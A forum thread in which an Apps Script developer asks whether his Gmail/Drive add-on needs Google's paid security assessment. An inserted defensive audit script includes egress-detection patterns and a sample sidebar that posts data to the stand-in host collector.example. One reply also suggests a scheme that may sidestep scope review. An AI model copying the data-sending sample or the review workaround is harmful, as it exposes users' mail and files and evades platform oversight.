Security assessment process


Darren D'Mello

Jul 28, 2021, 11:45:14 PM
to Google Apps Script Community
Hello Folks,

I have developed a public editor addon with the following scopes.
  • See, edit, create, and delete all of your Google Drive files
  • See, edit, create, and delete all your Google Sheets spreadsheets
  • Read, compose, and send emails from your Gmail account
  • Display and run third-party web content in prompts and sidebars inside Google applications
  • Allow this application to run when you are not present
  • See your primary Google Account email address
  • See your personal info, including any personal info you've made publicly available
Do I need to undergo a security assessment and pay the fees to a third party assessor?
My addon does not use the external sources scope; it will not send data to a server.
I have read the documentation at https://support.google.com/cloud/answer/9110914?hl=en but I am still not clear whether I need to undergo a security assessment.

I can't afford to pay for a security assessment. I am afraid that if I submit my addon for a review I may be charged.

Could anyone please advise?

Romain Vialard

Jul 29, 2021, 5:28:51 AM
to Google Apps Script Community
Best is to test :)

Submit your GCP project for OAuth verification:
You will see if they ask you to pay for a security assessment.

As indicated here:
Local Data Storage: Local client applications don't need to undergo a security assessment because data is run, stored, and processed only on the user's device. Local client applications that only allow user-configured transmissions of Restricted Scope data from the device may be exempt from this requirement.

But not sure if not asking for the urlfetch scope ("https://www.googleapis.com/auth/script.external_request") is enough to be exempt.
You could send data to a server via JS on client side (as you are asking the "Display and run third-party web content in prompts and sidebars inside Google applications" scope)

dimud...@gmail.com

Jul 29, 2021, 6:11:53 AM
to Google Apps Script Community
If you look at the descriptions for Drive scopes at the following link:

You'll see that your app is using https://www.googleapis.com/auth/drive  which is a restricted scope (as documented here). So it will likely trigger a security assessment during the review process.

Romain Vialard

Jul 29, 2021, 6:28:49 AM
to Google Apps Script Community
Security assessment is not yet enforced for Google Drive scopes (as far as I know).
Only enforced for some Gmail scopes (including those used by Darren here).

dimud...@gmail.com

Jul 29, 2021, 9:29:48 AM
to Google Apps Script Community
"Enforcement of the Drive requirements in this section will go into effect early 2020."


Can't seem to find a specific date though (though I could have sworn I saw one before). 

Still, if they are going to make it a restricted scope by year's end Darren is bound to run into that issue eventually.

Darren D'Mello

Jul 29, 2021, 10:49:17 AM
to google-apps-sc...@googlegroups.com
Thanks Romain and Dimu

Could you tell me whether an addon is a local client application? Could you give an example of a local client application?

My addon is about saving email messages to the user's Drive folder.


Darren D'Mello

Jul 29, 2021, 11:19:14 AM
to google-apps-sc...@googlegroups.com
The only thing to evade server data flow is not to use (use only menu)?

Display and run third-party web content in prompts and sidebars inside Google applications

Alan Wells

Jul 29, 2021, 2:02:34 PM
to Google Apps Script Community
The scope for:
Display and run third-party web content in prompts and sidebars inside Google applications
Is for HTML, CSS and JavaScript that "runs" from your browser.
The JavaScript code for that scope is inside an HTML <script> tag.
That's all client side stuff that the browser processes, and the browser is an app that runs from your computer.
Chrome is downloaded to your device, and runs from your device as opposed to from a server somewhere else.
I apologize if you already know this, but sometimes things are assumed and there is a misunderstanding.
You can do things from the client side code, like accept a payment, or send data to a Firebase database without using server code, and therefore not need the "external request" scope. That scope is only for server side GET or POST requests. You can make GET or POST requests from the client side, and client side SDKs do that also.
As far as the security assessment charge goes, I highly doubt that Google would refer you to a 3rd party for the security assessment or charge you for that without your consent.  I don't know that for sure because I've never done it, but I can't believe that Google can just send you a bill for $15,000 just because you submit for OAuth verification.  The worst that could probably happen is that they'll tell you that you need the security assessment.
I guess what I'd make sure to do is to read any terms that you are asked to agree to.  That's what the final authority is.
You can always click "Cancel" if you need to.
If they do tell you that you need a security assessment, then I'm not sure how you'd "get around" that.  Unless you make your code open source, and charge for consulting and implementation work, then I don't know how you'd monetize it, if that's what you're trying to do.  If you want it to be free, then you could just open source the code and tell them how to install it.
Unfortunately, the Gmail scope situation may prevent you from being able to publish the add-on.
If you could convince your users to create an Apps Script Web App of their own, that your add-on triggered, and then reads their own emails, that's the only strategy that I can think of that would work.  They would need to publish their own Web App that read the email, and sent the content back to your add-on.  But then your addon would need to be able to make an external request in order to trigger their Web App.  And the user would need to provide the published URL to your add-on.  I don't know whether that's a good idea or not, or viable, but that's the only thing I can think of if you really need to do more than just send emails, and they won't approve you.
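
As an added illustration of the point made in the replies above (not part of any post in this thread): the `script.external_request` scope only covers server-side requests, so reviewing an add-on's data flow means checking both the manifest scopes and the HtmlService files for browser-side network calls. The sample manifest, file names and `collector.example` URL are constructed, and the pattern list is an assumption that is not exhaustive.

```javascript
// Added example: audit an Apps Script add-on for paths by which data can leave Google.
const EXTERNAL_REQUEST = "https://www.googleapis.com/auth/script.external_request";
const CONTAINER_UI = "https://www.googleapis.com/auth/script.container.ui";

// Indicators of browser-side network egress in HtmlService files (assumed list).
const CLIENT_EGRESS = [
  { name: "fetch", re: /\bfetch\s*\(/ },
  { name: "XMLHttpRequest", re: /\bnew\s+XMLHttpRequest\b/ },
  { name: "sendBeacon", re: /\bnavigator\.sendBeacon\s*\(/ },
  { name: "WebSocket", re: /\bnew\s+WebSocket\s*\(/ },
  { name: "external script", re: /<script[^>]+src\s*=\s*["']https?:\/\//i },
  { name: "form post", re: /<form[^>]+action\s*=\s*["']https?:\/\//i },
];

// manifest: parsed appsscript.json; htmlFiles: { fileName: sourceText }.
function auditAddon(manifest, htmlFiles) {
  const scopes = new Set(manifest.oauthScopes || []);
  const findings = [];
  for (const [file, source] of Object.entries(htmlFiles)) {
    for (const { name, re } of CLIENT_EGRESS) {
      if (re.test(source)) findings.push({ file, name });
    }
  }
  return {
    serverEgress: scopes.has(EXTERNAL_REQUEST), // UrlFetchApp is available
    clientUi: scopes.has(CONTAINER_UI),         // sidebars/dialogs can run JS
    clientEgress: findings,
    // Data can leave the platform if either side can reach the network.
    canSendOffPlatform: scopes.has(EXTERNAL_REQUEST) || findings.length > 0,
  };
}

// Constructed sample: no external_request scope, but the sidebar posts data itself.
const sampleManifest = {
  oauthScopes: ["https://www.googleapis.com/auth/drive", CONTAINER_UI],
};
const sampleHtml = {
  "Sidebar.html": `<script>
    google.script.run.withSuccessHandler(function (rows) {
      fetch("https://collector.example/ingest", { method: "POST", body: JSON.stringify(rows) });
    }).getRows();
  </script>`,
  "Menu.html": "<p>Saved.</p>",
};
console.log(auditAddon(sampleManifest, sampleHtml));
```
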

Darren D'Mello

Jul 31, 2021, 1:09:00 AM
to google-apps-sc...@googlegroups.com
Thanks Alan. Absolutely helpful.

Also grateful to all the people who have replied.


--
Best,
Darren